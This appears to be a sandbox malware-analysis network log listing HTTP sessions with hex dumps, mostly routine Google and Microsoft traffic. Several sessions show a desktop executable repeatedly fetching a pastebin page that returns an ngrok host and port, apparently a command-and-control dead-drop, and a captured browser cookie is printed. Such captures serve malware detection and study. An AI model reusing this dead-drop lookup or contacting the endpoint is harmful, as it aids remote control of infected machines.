                                                                    Sec-Fetch-Site: cross-site
                                                                    Sec-Fetch-Mode: no-cors
                                                                    Sec-Fetch-Dest: empty
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Cookie: 1P_JAR=2024-05-02-04; NID=513=TDdb6B1qf0imS6sQ9UI386TSBmUeGbONEAs1g_SjFnFVZT8tlWjduo1BWv8tK_X2kdpw5DyqH6DyKssZClnoNAKybygsq-HKlTpEzxscqZJ_pjS1BKmEZAqlwshMLYfbeJHYWJdOjDcEir8XmubnkA88KvIUU07OLdpJjmvAUwk
                                                                    2024-05-02 04:01:01 UTC356INHTTP/1.1 429 Too Many Requests
                                                                    Date: Thu, 02 May 2024 04:01:01 GMT
                                                                    Pragma: no-cache
                                                                    Expires: Fri, 01 Jan 1990 00:00:00 GMT
                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                    Content-Type: text/html
                                                                    Server: HTTP server (unknown)
                                                                    Content-Length: 3113
                                                                    X-XSS-Protection: 0
                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                    Connection: close
                                                                    2024-05-02 04:01:01 UTC899INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 73 79 6e 63 2f 6e 65 77 74 61 62 5f 70 72 6f 6d 6f 73 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64
                                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><meta http-equiv="content-type" content="text/html; charset=utf-8"><meta name="viewport" content="initial-scale=1"><title>https://www.google.com/async/newtab_promos</title></head
                                                                    2024-05-02 04:01:01 UTC1255INData Raw: 61 63 6b 20 3d 20 66 75 6e 63 74 69 6f 6e 28 72 65 73 70 6f 6e 73 65 29 20 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 63 61 70 74 63 68 61 2d 66 6f 72 6d 27 29 2e 73 75 62 6d 69 74 28 29 3b 7d 3b 3c 2f 73 63 72 69 70 74 3e 0a 3c 64 69 76 20 69 64 3d 22 72 65 63 61 70 74 63 68 61 22 20 63 6c 61 73 73 3d 22 67 2d 72 65 63 61 70 74 63 68 61 22 20 64 61 74 61 2d 73 69 74 65 6b 65 79 3d 22 36 4c 66 77 75 79 55 54 41 41 41 41 41 4f 41 6d 6f 53 30 66 64 71 69 6a 43 32 50 62 62 64 48 34 6b 6a 71 36 32 59 31 62 22 20 64 61 74 61 2d 63 61 6c 6c 62 61 63 6b 3d 22 73 75 62 6d 69 74 43 61 6c 6c 62 61 63 6b 22 20 64 61 74 61 2d 73 3d 22 33 47 30 51 70 41 65 32 56 6d 66 47 69 4f 4a 39 44 4f 41 75 58 45 35 63 32 66 54 43 32 75 65 37 6b
                                                                    Data Ascii: ack = function(response) {document.getElementById('captcha-form').submit();};</script><div id="recaptcha" class="g-recaptcha" data-sitekey="6LfwuyUTAAAAAOAmoS0fdqijC2PbbdH4kjq62Y1b" data-callback="submitCallback" data-s="3G0QpAe2VmfGiOJ9DOAuXE5c2fTC2ue7k
                                                                    2024-05-02 04:01:01 UTC959INData Raw: 6f 67 6c 65 20 61 75 74 6f 6d 61 74 69 63 61 6c 6c 79 20 64 65 74 65 63 74 73 20 72 65 71 75 65 73 74 73 20 63 6f 6d 69 6e 67 20 66 72 6f 6d 20 79 6f 75 72 20 63 6f 6d 70 75 74 65 72 20 6e 65 74 77 6f 72 6b 20 77 68 69 63 68 20 61 70 70 65 61 72 20 74 6f 20 62 65 20 69 6e 20 76 69 6f 6c 61 74 69 6f 6e 20 6f 66 20 74 68 65 20 3c 61 20 68 72 65 66 3d 22 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 70 6f 6c 69 63 69 65 73 2f 74 65 72 6d 73 2f 22 3e 54 65 72 6d 73 20 6f 66 20 53 65 72 76 69 63 65 3c 2f 61 3e 2e 20 54 68 65 20 62 6c 6f 63 6b 20 77 69 6c 6c 20 65 78 70 69 72 65 20 73 68 6f 72 74 6c 79 20 61 66 74 65 72 20 74 68 6f 73 65 20 72 65 71 75 65 73 74 73 20 73 74 6f 70 2e 20 20 49 6e 20 74 68 65 20 6d 65 61 6e 74 69 6d 65 2c 20 73 6f 6c 76 69 6e
                                                                    Data Ascii: ogle automatically detects requests coming from your computer network which appear to be in violation of the <a href="//www.google.com/policies/terms/">Terms of Service</a>. The block will expire shortly after those requests stop. In the meantime, solvin


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    4192.168.2.449739142.251.40.2284437256C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-05-02 04:01:01 UTC912OUTGET /sorry/index?continue=https://www.google.com/async/newtab_ogb%3Fhl%3Den-US%26async%3Dfixed:0&hl=en-US&q=EgS_YJbhGPufzLEGIjDqkokB_Yx903z9S8-TdyWhW8iPlrZBrgRiiMPzrxlLxgoQH634QKXADTY9t1vdNmMyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1
                                                                    Host: www.google.com
                                                                    Connection: keep-alive
                                                                    X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiTocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUX
                                                                    Sec-Fetch-Site: cross-site
                                                                    Sec-Fetch-Mode: no-cors
                                                                    Sec-Fetch-Dest: empty
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Cookie: 1P_JAR=2024-05-02-04; NID=513=TDdb6B1qf0imS6sQ9UI386TSBmUeGbONEAs1g_SjFnFVZT8tlWjduo1BWv8tK_X2kdpw5DyqH6DyKssZClnoNAKybygsq-HKlTpEzxscqZJ_pjS1BKmEZAqlwshMLYfbeJHYWJdOjDcEir8XmubnkA88KvIUU07OLdpJjmvAUwk
                                                                    2024-05-02 04:01:01 UTC356INHTTP/1.1 429 Too Many Requests
                                                                    Date: Thu, 02 May 2024 04:01:01 GMT
                                                                    Pragma: no-cache
                                                                    Expires: Fri, 01 Jan 1990 00:00:00 GMT
                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                    Content-Type: text/html
                                                                    Server: HTTP server (unknown)
                                                                    Content-Length: 3185
                                                                    X-XSS-Protection: 0
                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                    Connection: close
                                                                    2024-05-02 04:01:01 UTC899INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 73 79 6e 63 2f 6e 65 77 74 61 62 5f 6f 67 62 3f 68 6c 3d 65 6e 2d 55 53 26 61 6d 70 3b 61 73 79
                                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><meta http-equiv="content-type" content="text/html; charset=utf-8"><meta name="viewport" content="initial-scale=1"><title>https://www.google.com/async/newtab_ogb?hl=en-US&amp;asy
                                                                    2024-05-02 04:01:01 UTC1255INData Raw: 0a 3c 73 63 72 69 70 74 3e 76 61 72 20 73 75 62 6d 69 74 43 61 6c 6c 62 61 63 6b 20 3d 20 66 75 6e 63 74 69 6f 6e 28 72 65 73 70 6f 6e 73 65 29 20 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 63 61 70 74 63 68 61 2d 66 6f 72 6d 27 29 2e 73 75 62 6d 69 74 28 29 3b 7d 3b 3c 2f 73 63 72 69 70 74 3e 0a 3c 64 69 76 20 69 64 3d 22 72 65 63 61 70 74 63 68 61 22 20 63 6c 61 73 73 3d 22 67 2d 72 65 63 61 70 74 63 68 61 22 20 64 61 74 61 2d 73 69 74 65 6b 65 79 3d 22 36 4c 66 77 75 79 55 54 41 41 41 41 41 4f 41 6d 6f 53 30 66 64 71 69 6a 43 32 50 62 62 64 48 34 6b 6a 71 36 32 59 31 62 22 20 64 61 74 61 2d 63 61 6c 6c 62 61 63 6b 3d 22 73 75 62 6d 69 74 43 61 6c 6c 62 61 63 6b 22 20 64 61 74 61 2d 73 3d 22 6b 78 61 4e 70 32 7a 43 56
                                                                    Data Ascii: <script>var submitCallback = function(response) {document.getElementById('captcha-form').submit();};</script><div id="recaptcha" class="g-recaptcha" data-sitekey="6LfwuyUTAAAAAOAmoS0fdqijC2PbbdH4kjq62Y1b" data-callback="submitCallback" data-s="kxaNp2zCV
                                                                    2024-05-02 04:01:01 UTC1031INData Raw: 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 34 65 6d 3b 22 3e 0a 54 68 69 73 20 70 61 67 65 20 61 70 70 65 61 72 73 20 77 68 65 6e 20 47 6f 6f 67 6c 65 20 61 75 74 6f 6d 61 74 69 63 61 6c 6c 79 20 64 65 74 65 63 74 73 20 72 65 71 75 65 73 74 73 20 63 6f 6d 69 6e 67 20 66 72 6f 6d 20 79 6f 75 72 20 63 6f 6d 70 75 74 65 72 20 6e 65 74 77 6f 72 6b 20 77 68 69 63 68 20 61 70 70 65 61 72 20 74 6f 20 62 65 20 69 6e 20 76 69 6f 6c 61 74 69 6f 6e 20 6f 66 20 74 68 65 20 3c 61 20 68 72 65 66 3d 22 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 70 6f 6c 69 63 69 65 73 2f 74 65 72 6d 73 2f 22 3e 54 65 72 6d 73 20 6f 66 20 53 65 72 76 69 63 65 3c 2f 61 3e 2e 20 54 68 65 20 62 6c 6f 63 6b 20 77 69 6c 6c 20 65 78 70 69 72 65 20 73 68 6f 72 74 6c 79 20 61 66 74
                                                                    Data Ascii: ; line-height:1.4em;">This page appears when Google automatically detects requests coming from your computer network which appear to be in violation of the <a href="//www.google.com/policies/terms/">Terms of Service</a>. The block will expire shortly aft


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    5192.168.2.449743104.118.8.139443
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-05-02 04:01:06 UTC161OUTHEAD /fs/windows/config.json HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Accept: */*
                                                                    Accept-Encoding: identity
                                                                    User-Agent: Microsoft BITS/7.8
                                                                    Host: fs.microsoft.com
                                                                    2024-05-02 04:01:06 UTC466INHTTP/1.1 200 OK
                                                                    Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                    Content-Type: application/octet-stream
                                                                    ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                    Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                    Server: ECAcc (chd/073D)
                                                                    X-CID: 11
                                                                    X-Ms-ApiVersion: Distribute 1.2
                                                                    X-Ms-Region: prod-eus-z1
                                                                    Cache-Control: public, max-age=97352
                                                                    Date: Thu, 02 May 2024 04:01:06 GMT
                                                                    Connection: close
                                                                    X-CID: 2


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    6192.168.2.449744104.118.8.139443
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-05-02 04:01:06 UTC239OUTGET /fs/windows/config.json HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Accept: */*
                                                                    Accept-Encoding: identity
                                                                    If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT
                                                                    Range: bytes=0-2147483646
                                                                    User-Agent: Microsoft BITS/7.8
                                                                    Host: fs.microsoft.com
                                                                    2024-05-02 04:01:06 UTC530INHTTP/1.1 200 OK
                                                                    Content-Type: application/octet-stream
                                                                    Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                    ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                    ApiVersion: Distribute 1.1
                                                                    Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                    X-Azure-Ref: 0rcGnYgAAAAANOnx9vccHTr21ROgX9ESTU0pDRURHRTAzMDkAY2VmYzI1ODMtYTliMi00NGE3LTk3NTUtYjc2ZDE3ZTA1Zjdm
                                                                    Cache-Control: public, max-age=97362
                                                                    Date: Thu, 02 May 2024 04:01:06 GMT
                                                                    Content-Length: 55
                                                                    Connection: close
                                                                    X-CID: 2
                                                                    2024-05-02 04:01:06 UTC55INData Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d
                                                                    Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    7192.168.2.449745104.20.3.2354432472C:\Users\user\Desktop\G1lnGpOLK4.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-05-02 04:01:07 UTC74OUTGET /raw/s4TipmJt HTTP/1.1
                                                                    Host: pastebin.com
                                                                    Connection: Keep-Alive
                                                                    2024-05-02 04:01:07 UTC388INHTTP/1.1 200 OK
                                                                    Date: Thu, 02 May 2024 04:01:07 GMT
                                                                    Content-Type: text/plain; charset=utf-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    x-frame-options: DENY
                                                                    x-content-type-options: nosniff
                                                                    x-xss-protection: 1;mode=block
                                                                    cache-control: public, max-age=1801
                                                                    CF-Cache-Status: MISS
                                                                    Last-Modified: Thu, 02 May 2024 04:01:07 GMT
                                                                    Server: cloudflare
                                                                    CF-RAY: 87d51bb3a9c60ca6-EWR
                                                                    2024-05-02 04:01:07 UTC29INData Raw: 31 37 0d 0a 30 2e 74 63 70 2e 65 75 2e 6e 67 72 6f 6b 2e 69 6f 3a 31 35 31 35 35 0d 0a
                                                                    Data Ascii: 170.tcp.eu.ngrok.io:15155
                                                                    2024-05-02 04:01:07 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                    Data Ascii: 0


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    8192.168.2.44974640.68.123.157443
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-05-02 04:01:12 UTC306OUTGET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=hBoxWr7ezrOa1ze&MD=M6HZe6PE HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Accept: */*
                                                                    User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                    Host: slscr.update.microsoft.com
                                                                    2024-05-02 04:01:12 UTC560INHTTP/1.1 200 OK
                                                                    Cache-Control: no-cache
                                                                    Pragma: no-cache
                                                                    Content-Type: application/octet-stream
                                                                    Expires: -1
                                                                    Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                    ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880"
                                                                    MS-CorrelationId: e70080eb-e66b-4ba2-96f3-bb5cb80b8b85
                                                                    MS-RequestId: 0a10ddeb-fa30-4d44-815c-db20fda5122a
                                                                    MS-CV: 0s2PZRdpBEm8Q7mr.0
                                                                    X-Microsoft-SLSClientCache: 2880
                                                                    Content-Disposition: attachment; filename=environment.cab
                                                                    X-Content-Type-Options: nosniff
                                                                    Date: Thu, 02 May 2024 04:01:12 GMT
                                                                    Connection: close
                                                                    Content-Length: 24490
                                                                    2024-05-02 04:01:12 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58
                                                                    Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
                                                                    2024-05-02 04:01:12 UTC8666INData Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31
                                                                    Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    9192.168.2.449753104.20.3.2354432472C:\Users\user\Desktop\G1lnGpOLK4.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-05-02 04:01:16 UTC50OUTGET /raw/s4TipmJt HTTP/1.1
                                                                    Host: pastebin.com
                                                                    2024-05-02 04:01:16 UTC395INHTTP/1.1 200 OK
                                                                    Date: Thu, 02 May 2024 04:01:16 GMT
                                                                    Content-Type: text/plain; charset=utf-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    x-frame-options: DENY
                                                                    x-content-type-options: nosniff
                                                                    x-xss-protection: 1;mode=block
                                                                    cache-control: public, max-age=1801
                                                                    CF-Cache-Status: HIT
                                                                    Age: 9
                                                                    Last-Modified: Thu, 02 May 2024 04:01:07 GMT
                                                                    Server: cloudflare
                                                                    CF-RAY: 87d51beca8ab8c27-EWR
                                                                    2024-05-02 04:01:16 UTC29INData Raw: 31 37 0d 0a 30 2e 74 63 70 2e 65 75 2e 6e 67 72 6f 6b 2e 69 6f 3a 31 35 31 35 35 0d 0a
                                                                    Data Ascii: 170.tcp.eu.ngrok.io:15155
                                                                    2024-05-02 04:01:16 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                    Data Ascii: 0


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    10192.168.2.449755104.20.3.2354432472C:\Users\user\Desktop\G1lnGpOLK4.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-05-02 04:01:21 UTC50OUTGET /raw/s4TipmJt HTTP/1.1
                                                                    Host: pastebin.com
                                                                    2024-05-02 04:01:21 UTC396INHTTP/1.1 200 OK
                                                                    Date: Thu, 02 May 2024 04:01:21 GMT
                                                                    Content-Type: text/plain; charset=utf-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    x-frame-options: DENY
                                                                    x-content-type-options: nosniff
                                                                    x-xss-protection: 1;mode=block
                                                                    cache-control: public, max-age=1801
                                                                    CF-Cache-Status: HIT
                                                                    Age: 14
                                                                    Last-Modified: Thu, 02 May 2024 04:01:07 GMT
                                                                    Server: cloudflare
                                                                    CF-RAY: 87d51c0e1e008c57-EWR
                                                                    2024-05-02 04:01:21 UTC29INData Raw: 31 37 0d 0a 30 2e 74 63 70 2e 65 75 2e 6e 67 72 6f 6b 2e 69 6f 3a 31 35 31 35 35 0d 0a
                                                                    Data Ascii: 170.tcp.eu.ngrok.io:15155
                                                                    2024-05-02 04:01:21 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                    Data Ascii: 0


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    11192.168.2.449757104.20.3.2354432472C:\Users\user\Desktop\G1lnGpOLK4.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-05-02 04:01:26 UTC50OUTGET /raw/s4TipmJt HTTP/1.1
                                                                    Host: pastebin.com
                                                                    2024-05-02 04:01:26 UTC396INHTTP/1.1 200 OK
                                                                    Date: Thu, 02 May 2024 04:01:26 GMT
                                                                    Content-Type: text/plain; charset=utf-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    x-frame-options: DENY
                                                                    x-content-type-options: nosniff
                                                                    x-xss-protection: 1;mode=block
                                                                    cache-control: public, max-age=1801
                                                                    CF-Cache-Status: HIT
                                                                    Age: 19
                                                                    Last-Modified: Thu, 02 May 2024 04:01:07 GMT
                                                                    Server: cloudflare
                                                                    CF-RAY: 87d51c2f1e5d5e78-EWR
                                                                    2024-05-02 04:01:26 UTC29INData Raw: 31 37 0d 0a 30 2e 74 63 70 2e 65 75 2e 6e 67 72 6f 6b 2e 69 6f 3a 31 35 31 35 35 0d 0a
                                                                    Data Ascii: 170.tcp.eu.ngrok.io:15155
                                                                    2024-05-02 04:01:26 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                    Data Ascii: 0


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    12192.168.2.449759104.20.3.2354432472C:\Users\user\Desktop\G1lnGpOLK4.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-05-02 04:01:32 UTC50OUTGET /raw/s4TipmJt HTTP/1.1
                                                                    Host: pastebin.com
                                                                    2024-05-02 04:01:32 UTC396INHTTP/1.1 200 OK
                                                                    Date: Thu, 02 May 2024 04:01:32 GMT
                                                                    Content-Type: text/plain; charset=utf-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    x-frame-options: DENY
                                                                    x-content-type-options: nosniff
                                                                    x-xss-protection: 1;mode=block
                                                                    cache-control: public, max-age=1801
                                                                    CF-Cache-Status: HIT
                                                                    Age: 25
                                                                    Last-Modified: Thu, 02 May 2024 04:01:07 GMT
                                                                    Server: cloudflare
                                                                    CF-RAY: 87d51c503c5fc443-EWR
                                                                    2024-05-02 04:01:32 UTC29INData Raw: 31 37 0d 0a 30 2e 74 63 70 2e 65 75 2e 6e 67 72 6f 6b 2e 69 6f 3a 31 35 31 35 35 0d 0a
                                                                    Data Ascii: 170.tcp.eu.ngrok.io:15155
                                                                    2024-05-02 04:01:32 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                    Data Ascii: 0


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    13192.168.2.449761104.20.3.2354432472C:\Users\user\Desktop\G1lnGpOLK4.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-05-02 04:01:37 UTC50OUTGET /raw/s4TipmJt HTTP/1.1
                                                                    Host: pastebin.com
                                                                    2024-05-02 04:01:37 UTC396INHTTP/1.1 200 OK
                                                                    Date: Thu, 02 May 2024 04:01:37 GMT
                                                                    Content-Type: text/plain; charset=utf-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    x-frame-options: DENY
                                                                    x-content-type-options: nosniff
                                                                    x-xss-protection: 1;mode=block
                                                                    cache-control: public, max-age=1801
                                                                    CF-Cache-Status: HIT
                                                                    Age: 30
                                                                    Last-Modified: Thu, 02 May 2024 04:01:07 GMT
                                                                    Server: cloudflare
                                                                    CF-RAY: 87d51c713fc272aa-EWR
                                                                    2024-05-02 04:01:37 UTC29INData Raw: 31 37 0d 0a 30 2e 74 63 70 2e 65 75 2e 6e 67 72 6f 6b 2e 69 6f 3a 31 35 31 35 35 0d 0a
                                                                    Data Ascii: 170.tcp.eu.ngrok.io:15155
                                                                    2024-05-02 04:01:37 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                    Data Ascii: 0


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    14192.168.2.449763104.20.3.2354432472C:\Users\user\Desktop\G1lnGpOLK4.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-05-02 04:01:42 UTC50OUTGET /raw/s4TipmJt HTTP/1.1
                                                                    Host: pastebin.com
                                                                    2024-05-02 04:01:42 UTC396INHTTP/1.1 200 OK
                                                                    Date: Thu, 02 May 2024 04:01:42 GMT
                                                                    Content-Type: text/plain; charset=utf-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    x-frame-options: DENY
                                                                    x-content-type-options: nosniff
                                                                    x-xss-protection: 1;mode=block
                                                                    cache-control: public, max-age=1801
                                                                    CF-Cache-Status: HIT
                                                                    Age: 35
                                                                    Last-Modified: Thu, 02 May 2024 04:01:07 GMT
                                                                    Server: cloudflare
                                                                    CF-RAY: 87d51c925d1442e6-EWR
                                                                    2024-05-02 04:01:42 UTC29INData Raw: 31 37 0d 0a 30 2e 74 63 70 2e 65 75 2e 6e 67 72 6f 6b 2e 69 6f 3a 31 35 31 35 35 0d 0a
                                                                    Data Ascii: 170.tcp.eu.ngrok.io:15155
                                                                    2024-05-02 04:01:42 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                    Data Ascii: 0


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    15192.168.2.449765104.20.3.2354432472C:\Users\user\Desktop\G1lnGpOLK4.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-05-02 04:01:48 UTC50OUTGET /raw/s4TipmJt HTTP/1.1
                                                                    Host: pastebin.com
                                                                    2024-05-02 04:01:48 UTC396INHTTP/1.1 200 OK
                                                                    Date: Thu, 02 May 2024 04:01:48 GMT
                                                                    Content-Type: text/plain; charset=utf-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    x-frame-options: DENY
                                                                    x-content-type-options: nosniff
                                                                    x-xss-protection: 1;mode=block
                                                                    cache-control: public, max-age=1801
                                                                    CF-Cache-Status: HIT
                                                                    Age: 41
                                                                    Last-Modified: Thu, 02 May 2024 04:01:07 GMT
                                                                    Server: cloudflare
                                                                    CF-RAY: 87d51cb51e681a13-EWR
